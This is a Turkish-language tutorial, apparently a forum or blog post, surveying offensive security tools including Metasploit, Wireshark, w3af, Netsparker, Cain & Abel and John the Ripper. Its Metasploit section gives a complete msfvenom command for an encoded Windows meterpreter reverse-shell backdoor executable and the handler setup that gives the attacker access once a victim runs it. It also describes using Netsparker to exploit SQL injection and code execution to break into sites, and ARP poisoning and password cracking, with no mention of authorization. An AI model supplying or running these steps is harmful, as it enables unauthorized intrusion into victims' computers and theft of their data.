BAZI METASPLOİT ARAÇLARI
ilk olarak Metasploit nedir bunu birçoğunuz duymuşsunuzdur..
Metasploit, sızma testlerinde kullanılabilecek en idal yazılımlardan birisidir,içerisinde exploitler, payloadlar, auxiliaryler ve encoderlerin bulunduğu bir altyapıdır. Metasploit ile sadece saldırı yapılmaz. İşletim sistemlerinde yönelik backdoorlar oluşturulabilir ve bunlar üzerinden hedef sisteme saldırı ve ele geçirme işlemi yapılır...
backdoor oluşturalım...
terminalden ilk önce masaüstüne geliyoruz türkçe kullanıyorsanız cd Masaüstü/
ingilizce kullanıyorsanız cd Desktop/ yazarak masaüstüne geliyoruz ardından
bu komutları yazıyoruz...
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=ip adresimiz LPORT=4444 -f exe -o \root\backdoor.exe" yazıyoruz..
tabi burada LHOST nedir diyicek olursanız buraya kendi ip adresimizi yazıyoruz..
nasıl öğrenicem diyorsanız boş bir terminal açıp ifconfig yazıp ipv4 adresiniz sizin kendi ip adresinizdir onu LPORT=ip adresiniz şeklinde yazıyoruz bu LPORT ta istediğiniz portu yazabilirsiniz genelde 4444. port kullanılıyor...
şimdi burada birçok komut kullandık bunları açıklıyıcak olursak.
- msfvenom : payload oluşturacağımız için bu komutu yazıyoruz
- -i : burada encoding işleminin kaç kere tekrarlanacağını belirtiyoruz
- -p : payload belirtmek için
- -e : encoder seçimini belirtmek için
- -b : bad characters leri temizlemek için
- -f : dosya tipini belirtmek için
- -o : hangi dizine kayıt edeceğini belirmek için kullanıyoruz
bu komutu yazdıktan sonra yeni bir terminal açıp bu komutları yazıyoruz...
msfconsole -q [bu komutta grafik göstermesini engelliyoruz]
ve daha sonra backdoor oluştururken girilen payload IP , PORT bilgilerini
tanımlıyoruz...
diğer komutlarda;
- use exploit/multi/handler : geri dönüş olacağını belirtiyoruz
- set PAYLOAD payload/payloadismi : dizine girmek için kullanıyoruz
- set LHOST : saldırganın ip adresi
- set LPORT : saldırgan port
- exploit : bunu yazarak dinleme işlemini başlatıyoruz eğer karşı taraf bu yaptığınız backdoor'u açarsa direk olarak size bilgiler geliyor..
Wireshark :
wireshark network trafiğinin bir grafik arayüz üzerinden izlenmesini sağlayan pek çok zaman hayat kurtarıcı öneme sahip programdır.uygulamanın kurulu olduğu bilgisayar üzerinden anlık network trafiği izlenebileceği gibi wireshark daha önce kaydedilmiş dosyaların incelenmesi amacı ilede kullanılabilir...
bu uygulamayı kurduğumuzda yanında başka bir uygulama daha kurulur bu uygulamanın
ismi Winpcap bu uygulama bilgisayarın anlık ethernet trafiğini yakalamasını
sağlayan bir programdır. wireshark bu uygulamadan gelen veriyi kullanarak grafik
bir arayüz üzerinden ethernet trafiğini inceleme ve izleme fırsatı sunar.
uygulamayı açıyoruz ve burada yapıcağımız şey START butonu altında bilgisayarımızdaki
algılanan ethernet kartları listeleniyor bunlardan birini seçiyoruz ve START'a basıyoruz..
ve bastığımız gibi ethernet kartının network trafiği loglanmaya başlıyor...
W3af :
python ile kodlanmıştır bunu kullanabilmek için bilgisayarınızda yada işletim sisteminizde python yüklü olması lazım.. SQL injection , XSS(Cross site scripting) RFI , LFI ve daha birçok açık tarayan bir programdır.. 130'dan fazla plug in vardır.
bu programın amacı yazdığımız yada kullandığımız scrpitleri tarayarak açıkları bulur saldırı
almadan önce güvenlik açıklarınızı kapatma şansına sahipsinz..
Netsparker :
web güvenlik tarayıcısıdır. otomatik olarak bir web sitesini uygulama seviyesindeki güvenlik açıklarına karşı analiz edip güvenlik açıklarını raporlar..yada güvenlik açıklarını kullanarak sistemden data çıkartabilir veya sisteme tam erişim sağlayabiliriz...
- XSS
- Reflected XSS
- Stored XSS
- Dom based XSS
- SQL injection
- Boolean SQL injection
- Blind SQL injection
- Script Source Code Disclosure
- Command Injection
- Blind Command Injection
- File Inclusion
- Remote File Inclusion (RFI)
- Local File Inclusion (LFI)
- Remote Code Evaluation
- Directory Traversal
- HTTP Header Injection
- Expression Language Injection
- Find Backup Files
- Crawl
Kullanımı :
Sol üst köşede bulunan Start New Scan, File menüsünde bulunan Start New Scan yada Ctrl + N tuş kombinasyonu ile yeni bir
tarama yapacağımızı belirtiyoruz..
karşımıza bir ekran gelicek orada Target URL kısmına hedef sitemizin adresini yazıyoruz..
hemen altında yani security tests kısmından istediğimizi seçiyoruz burada hepsi seçili
ne kadar çok seçili ise o kadar çok uzun süreceği anlamına geliyor..ve son olarak start scan
butonuna tıklıyoruz.
sitemap kısmında crawl ve zaafiyet çıktısı görülebilir uygulamamız burada site üzerinde
bulunan dosya ve klasörleri tespit ediyor..
Issues212 menüsünden Severity’i işaretleyerek zafiyetlerin kategorik bazda filtrelenmesini sağlıyoruz.
Hemen ardından Critical olarak işaretlenmiş zafiyetlere bakıyoruz.
Burda SQL Injection zafiyetlerinin tespit edildiğini görebiliriz.Netsparker’ın bu zafiyetleri kullanarak
exploit edebilmesi için, SQL Injection panelinin aktif edilmesi gerekiyor..
View menüsünden SQL Injection’ı tıklarsak,üst kısmında bulunan SQL Injection paneli görünecektir...
Böylece alt kısımdan zafiyeti seçtikten sonra üst tarafta bulunan SQL Injection panelinden exploit
ederek sisteme sızma işlemini gerçekleştirebiliriz. :))
Eğer bulunan zafiyetler arasında Code Execution zafiyeti mevcut ise, View menüsünden Code Execution’ı işaretliyerek
Code Execution paneli çalışacaktır. Böylece bulunan zafiyeti exploit ederek sisteme sızabiliriz..
Cain & Abel :
ağlarda şifre çözmekten dosyalara erişmeye kadar birçok işlemi yapan bir uygulama. Ancak uygulamanın kullanımı diğer programlara nazaran biraz daha zor.. çok başarılı bir network sniffer'dir. Yani ağ trafiğini dinleyebiliyor ve dosyaları saklayabiliyor. Normalde ağda iletişim kuran iki bilgisayar birbirlerine ağ kartlarının MAC adreslerini kontrol ederek güvenirler. Eğer MAC adresleri router üzerinde tanımlı değilse, bu durumda gönderilen paket ağdaki tüm bilgisayarlara gönderilir ve MAC adreslerinin uyup uymadığına bakılır. Cain & Abel'in ARP Poison Routing özelliği sayesinde ağın tam ortasında durarak gelen ve giden tüm verileri alabilir...
John The Ripper :
John The Ripper, bildiğimiz şifreleme yöntemlerinin tamamı ile oluşturulmuş hashleri vs hacklemek için kullanılan bir yazılımdır. Büyük bir avantajı bulunan bu program, Linux, Windows ve Unix gibi birçok tabanda çalışabilmektedir.. 3 adet kırma tekniği bulunan bu program şu tekniklere sahiptir.
- WordList yardımıyla şifre hack.
- Single Mod yardımıyla şifre hack.
- İnceremental Mod yardımıyla şifre hack.
